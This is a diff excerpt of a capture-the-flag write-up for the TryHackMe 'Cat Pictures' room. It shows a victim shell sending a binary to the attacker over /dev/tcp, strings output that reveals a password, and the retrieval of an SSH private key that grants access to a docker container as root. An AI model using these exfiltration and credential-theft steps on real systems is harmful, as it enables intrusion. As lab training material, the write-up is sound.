bl4ck574r/Writeups/THM/Cat Pictures.md

 # Victim
 cat runme > /dev/tcp/ourIP/9991
 ```

-We have the file on our local machine.
-Looking at file info, it was 64-bit ELF file non-stripped.
-So running strings on it, found
+We have the file on our local machine.Running strings on it, found
 ```
 rebecca
 Please enter yout password:
 Welcome, catlover!
 SSH key transfer queued! touch /tmp/gibmethesshkey
 ```
-Running the file on victim shell with the password worked.
-Waiting for few seconds we have a ssh private key file.
-Using this file, we can ssh into the box.
+Running the file on victim shell with the string we found worked.
+Waiting for few seconds we have a ssh private key file for `catlover`.
+Using this, we can ssh into the box.

 ## ROOT
 After gaining the shell, we were already root but we were in a docker-environment.